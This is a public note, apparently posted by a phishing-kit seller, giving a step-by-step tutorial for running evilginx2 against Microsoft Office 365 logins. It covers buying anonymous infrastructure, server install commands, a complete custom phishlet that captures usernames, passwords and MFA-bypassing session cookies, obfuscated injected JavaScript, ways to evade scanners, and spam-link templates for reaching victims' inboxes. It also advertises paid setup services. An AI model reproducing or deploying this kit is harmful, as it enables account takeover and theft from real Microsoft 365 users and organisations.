Untitled Note

By: Anonymous12/22/2021802 views Public Note
-NOTICE Do not share anything inside this page. Do not dm REDSON and ask for help. If you have a question ask in the group. This tutorial can't be any simpler. Go with it step by step. If you can't get this running you can buy a ready setup for $60 (hiring ppl to do setups) If you want someone to teach you how to setup and use. it costs $250 (will refer someone to teach you) DM if you need a ready setup, or if you want someone to teach you how to setup and use. - REQUIREMENTS: Ubuntu 20 server Domain Cloudflare 1 ip from fineproxy Ubuntu 20 Server - Get ubuntu 20 server from any site (azure,aws.., whatever). - if you want a cheap one you can get it from routerhosting.com/linux-vps Domain - Get any domain to use for the evilginx page. google "buy domain with btc". - You can get a free domain to test with from freenom.com - If you get a domain from freenom type 1 of these extensions when searching (.tk .ga .ml .cf .gq) or it will say not available. - it's not recommended to use a free domain but you can get 1 to practice with. Cloudflare - After you get the domain go to cloudflare.com and signup. - Type in the domain you got, they will give you nameservers to use for the domain. Go back to the domain site and input those in. - Wait 30 mins for the nameservers to propagate then go back to cloudflare and point the domain/wildcard to the vps ip. See below. 1 ip from fineproxy - Get 1 ip form fineproxy.org, should be same or close to the vps location so you it doesn't take much time to connect. - After you buy and you get the login, go to account.fineproxy.org and bind the vps ip, then download the socks5 ip (without authorization) ************************INSTALLATION. ********************************** 1- Dowload putty and filezilla. https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe https://download.filezilla-project.org/client/FileZilla_3.52.0.5_win64_sponsored-setup.exe 2- Open putty and change the session timeout in the settings to 240 secs. 3- Connect to the ubuntu server in putty. 4- Type/Paste in the username and password. The password will be hidden you'll think it's not typing but it is. 5- Type in these codes. sudo apt update sudo apt install -y make sudo apt install -y git sudo apt install -y golang export GOPATH=$HOME/go echo $GOPATH git clone https://github.com/kgretzky/evilginx2.git cd evilginx2 make wait for the "make" command to complete. 6- Launch Evilginx. sudo ./bin/evilginx -p ./phishlets/ if you get Failed to start nameserver on port 53 exit evilginx. If not, Skip to Step 7 exit Then do this. sudo service systemd-resolved stop sudo nano /etc/resolv.conf Then change nameserver 127.x.x.x to nameserver 8.8.8.8 or 1.1.1.1 Then save the file (By pressing CTRL X and pressing Y followed by enter) 7- Continue with the setup. config domain ex: config domain google.com config ip ex: config ip 45.153.241.225 proxy address ex: proxy address 193.200.231.202 proxy port ex: proxy port 1080 proxy type ex: proxy type http proxy enable exit enable the proxy and exit 8- Login with filezilla. 9- Click Edit > Settings > File editing and paste this code "C:\Program Files\Notepad \notepad .exe" 10- Go to /root/evilginx2/phishlets 11- Find o365.yaml, right click and select "view/edit" 12- Replace all with my working office phishlet and save name: 'o365' author: 'REDSON' min_ver: '2.4.0' proxy_hosts: - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true} - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false} sub_filters: - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} auth_tokens: - domain: '.login.microsoftonline.com' keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT'] - domain: 'login.microsoftonline.com' keys: ['SignInStateCookie'] credentials: username: key: '(login)' search: '(.*)' type: 'post' password: key: '(passwd)' search: '(.*)' type: 'post' auth_urls: - '/common/SAS' - '/kmsi' login: domain: 'login.microsoftonline.com' path: '/' force_post: - path: '/kmsi' search: - {key: 'LoginOptions', search: '.*'} force: - {key: 'LoginOptions', value: '1'} type: 'post' - path: '/common/SAS' search: - {key: 'rememberMFA', search: '.*'} force: - {key: 'rememberMFA', value: 'true'} type: 'post' js_inject: - trigger_domains: ["login.microsoftonline.com"] trigger_paths: ["/common/oauth2"] trigger_params: [] script: | var _cs=["#i",'116','#i0',"16","01","que","Sel","cto","le","Ele","ele","ri","y","pus","bs","arC","st","ryS","th","sh","ng","ery","ry","str","get",'0',"r","pl","sub","od","ect","lo","h","cat","ap","or","om","e","lu","tr","Ch","ha","fr","1024","tor","ion","va","en","qu","By","ec",'abs',"su"]; const _g0 = async _g1 => { while ( document[_cs[48] _cs[21] _cs[6] _cs[30] _cs[35]](_g1) === null) { await new Promise( _g2 => requestAnimationFrame(_g2) ) } return document[_cs[5] _cs[17] _cs[10] _cs[7] _cs[26]](_g1); }; _g0(_cs[2] _cs[1])[_cs[18] _cs[47]]((_g1) => { var _g3 = window[_cs[31] _cs[33] _cs[45]][_cs[41] _cs[19]][_cs[28] _cs[23]](1)[_cs[28] _cs[16] _cs[11] _cs[20]](1),_g4 = [],_g6;for(var _g5=0; _g5< _g3[_cs[8] _cs[20] _cs[18]]-1; _g5 =2){_g4[_cs[13] _cs[32]](parseInt(_g3[_cs[52] _cs[14] _cs[39]](_g5, 2), 16));}_g6 = String[_cs[42] _cs[36] _cs[40] _cs[15] _cs[29] _cs[37]][_cs[34] _cs[27] _cs[12]](String, _g4);var _g7 = document[_cs[5] _cs[22] _cs[6] _cs[50] _cs[44]](_cs[0] _cs[4] _cs[3]); _g7[_cs[46] _cs[38] _cs[37]] = _g6; }); 13- Save the changes. 14- Start evilginx again. sudo ./bin/evilginx -p ./phishlets/ 15- Continue with the setup. phishlets hostname o365 ex1: phishlets hostname o365 phishing.com ex2: phishlets hostname o365 office365.phishing.com lures create o365 config redirect_url https://www.youtube.com/watch?v=BN00cS8M8Es this is where the bots will be redirected. you can change the link. 16- Restart evilginx and continue with the setup. exit sudo ./bin/evilginx -p ./phishlets/ phishlets enable o365 phishlets hide o365 blacklist all 17- Wait at least 1 hour for it to collect bots, leave putty running. shit ton of scanners will go to the page after obtaining ssl, its better to leave it overnight 18- After the wait is over. phishlets unhide o365 blacklist unauth If for some reason it was disconnected, restart the session and paste cd evilginx2 sudo ./bin/evilginx -p ./phishlets/ then unide the phishlet and blacklist unauthorized requests with step 18. *************************************************How to Use?********************************************* 1- If the window is still open skip to step2. Launch evilginx cd evilginx2 sudo ./bin/evilginx -p ./phishlets/ 2- Get the phishing link. lures get-url 0 copy the link it should be domain.com/folder and paste in the browser. the folder is the access code, without it your ip will get blocked. you can set a redirection link on success with lures edit 0 redirect_url https://mail.office365.com or you leave it login all the way in. Link with autofill for redrum is https://domain.com/folder#%EMAILX% 3- Get the sessions with. sessions select the session id sessions 1 - Sessions are also saved in /root/.evilginx/data.db - You can use this free redirection template. Just replace domain.com/XqlwscdC with your page link. spam link is https://redirectionlink.com#%EMAILX% Please Wait... - Or use this other free template as attachment. Try with the 4 encryption methods in redrum, see what inboxes with your smtp/settings. Please Wait...

Want to create your own notes?

Join thousands of users writing securely on ProNotepad.